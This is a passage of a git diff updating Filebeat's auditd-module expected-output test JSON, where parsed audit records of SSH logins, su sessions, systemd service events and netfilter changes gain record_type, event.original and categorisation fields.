"auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1524, "process.pid": 28281, "service.type": "auditd", - "user.id": "0" + "user.effective.id": "700", + "user.id": "700" }, { "@timestamp": "2017-03-16T04:02:40.070Z", @@ -186,15 +264,25 @@ "auditd.log.laddr": "107.170.139.210", "auditd.log.lport": 50022, "auditd.log.op": "destroy", + "auditd.log.record_type": "CRYPTO_KEY_USER", "auditd.log.rport": 58994, "auditd.log.sequence": 19623788, "auditd.log.ses": "6793", "auditd.log.spid": "28282", - "event.action": "crypto_key_user", + "event.action": [ + "negotiated-crypto-key" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1640, @@ -220,15 +308,20 @@ { "@timestamp": "2017-03-16T04:02:40.072Z", "auditd.log.op": "success", + "auditd.log.record_type": "USER_AUTH", "auditd.log.sequence": 19623789, "auditd.log.ses": "6793", - "event.action": "user_auth", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], "event.category": [ "authentication" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=ssh res=success'", "event.outcome": "success", "event.type": [ "info" @@ -252,22 +345,28 @@ "source.geo.region_name": "Virginia", "source.ip": "96.241.146.97", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "admin", + "user.id": "700", "user.name": "admin", "user.terminal": "ssh" }, { "@timestamp": "2017-03-16T04:02:57.804Z", "auditd.log.op": "PAM:authentication", + "auditd.log.record_type": "USER_AUTH", "auditd.log.sequence": 19623807, "auditd.log.ses": "12286", - "event.action": "user_auth", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], "event.category": [ "authentication" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1489636977.804:19623807): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:authentication acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "event.outcome": "success", "event.type": [ "info" @@ -279,20 +378,32 @@ "process.pid": 28395, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root", "user.terminal": "pts/0" }, { "@timestamp": "2017-03-16T04:02:57.805Z", "auditd.log.op": "PAM:accounting", + "auditd.log.record_type": "USER_ACCT", "auditd.log.sequence": 19623808, "auditd.log.ses": "12286", - "event.action": "user_acct", + "auditd.log.uid": "0", + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2312, @@ -300,7 +411,8 @@ "process.pid": 28395, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root", "user.terminal": "pts/0" } diff --git a/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json index 4d14263e10f3..bd48d147b0cb 100644 --- a/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-rhel7.log-expected.json @@ -3,14 +3,24 @@ "@timestamp": "2016-12-07T02:16:23.819Z", "auditd.log.format": "raw", "auditd.log.kernel": "3.10.0-327.36.3.el7.x86_64", + "auditd.log.record_type": "DAEMON_START", "auditd.log.sequence": 7798, "auditd.log.subj": "system_u:system_r:auditd_t:s0", "auditd.log.ver": "2.4.1", - "event.action": "daemon_start", + "event.action": [ + "started-audit" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=DAEMON_START msg=audit(1481076983.819:7798): auditd start, ver=2.4.1 format=raw kernel=3.10.0-327.36.3.el7.x86_64 auid=4294967295 pid=251 subj=system_u:system_r:auditd_t:s0 res=success", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -20,15 +30,25 @@ }, { "@timestamp": "2016-12-07T02:16:23.864Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 6, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "auditd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076983.864:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 190, @@ -41,14 +61,18 @@ }, { "@timestamp": "2016-12-07T02:16:23.876Z", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 7, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_BOOT msg=audit(1481076983.876:7): pid=273 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -63,15 +87,25 @@ }, { "@timestamp": "2016-12-07T02:16:23.879Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 8, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-utmp", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076983.879:8): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-utmp comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 661, @@ -84,15 +118,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.075Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 9, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-hwdb-update", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.075:9): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-hwdb-update comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 903, @@ -105,15 +149,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.088Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 10, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-done", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.088:10): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-done comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1145, @@ -126,15 +180,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.163Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 11, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-udev-trigger", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.163:11): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-udev-trigger comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1388, @@ -147,15 +211,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.212Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 12, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.212:12): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1632, @@ -168,15 +242,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.521Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 13, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "avahi-daemon", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.521:13): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=avahi-daemon comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1866, @@ -189,15 +273,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.521Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 14, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "dbus", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.521:14): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=dbus comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2102, @@ -210,15 +304,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.526Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 15, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rsyslog", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.526:15): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rsyslog comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2330, @@ -231,15 +335,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.534Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 16, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076984.534:16): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2561, @@ -254,15 +368,19 @@ "@timestamp": "2016-12-07T02:16:24.827Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 17, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.827:17): table=filter family=2 entries=0", "event.type": [ "change" ], @@ -285,9 +403,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.827:17): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=390 pid=391 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -312,15 +437,19 @@ "@timestamp": "2016-12-07T02:16:24.858Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 18, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.858:18): table=raw family=2 entries=0", "event.type": [ "change" ], @@ -343,9 +472,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.858:18): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=395 pid=396 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -370,15 +506,19 @@ "@timestamp": "2016-12-07T02:16:24.870Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 19, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.870:19): table=security family=2 entries=0", "event.type": [ "change" ], @@ -401,9 +541,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.870:19): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=398 pid=399 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -428,15 +575,19 @@ "@timestamp": "2016-12-07T02:16:24.877Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 20, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.877:20): table=mangle family=2 entries=0", "event.type": [ "change" ], @@ -459,9 +610,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.877:20): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=401 pid=402 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -486,15 +644,19 @@ "@timestamp": "2016-12-07T02:16:24.931Z", "auditd.log.entries": 0, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 21, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.931:21): table=nat family=2 entries=0", "event.type": [ "change" ], @@ -517,9 +679,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.931:21): arch=c000003e syscall=313 success=yes exit=0 a0=3 a1=41a15c a2=0 a3=3 items=0 ppid=406 pid=407 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -542,15 +711,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.939Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 22, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "yum-cron", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.939:22): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=yum-cron comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 4785, @@ -563,15 +742,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.945Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 23, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rhel-dmesg", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.945:23): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rhel-dmesg comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5017, @@ -584,15 +773,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.953Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 24, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "acpid", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.953:24): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=acpid comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5251, @@ -605,15 +804,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.954Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 25, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-user-sessions", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.954:25): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-user-sessions comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5480, @@ -626,15 +835,25 @@ }, { "@timestamp": "2016-12-07T02:16:24.960Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 26, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "ntpd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076984.960:26): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=ntpd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 5725, @@ -649,15 +868,19 @@ "@timestamp": "2016-12-07T02:16:24.982Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 27, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076984.982:27): table=filter family=10 entries=0", "event.type": [ "change" ], @@ -680,9 +903,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076984.982:27): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=422 pid=423 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -705,15 +935,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.012Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 28, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-logind", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.012:28): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-logind comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6353, @@ -726,15 +966,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.031Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 29, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "crond", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.031:29): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=crond comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6591, @@ -747,15 +997,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.043Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 30, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "expand-root", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.043:30): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=expand-root comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 6820, @@ -768,15 +1028,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.044Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 31, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "expand-root", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.044:31): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=expand-root comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 7055, @@ -791,15 +1061,19 @@ "@timestamp": "2016-12-07T02:16:25.069Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 32, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.069:32): table=raw family=10 entries=0", "event.type": [ "change" ], @@ -822,9 +1096,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.069:32): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=439 pid=440 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -847,15 +1128,25 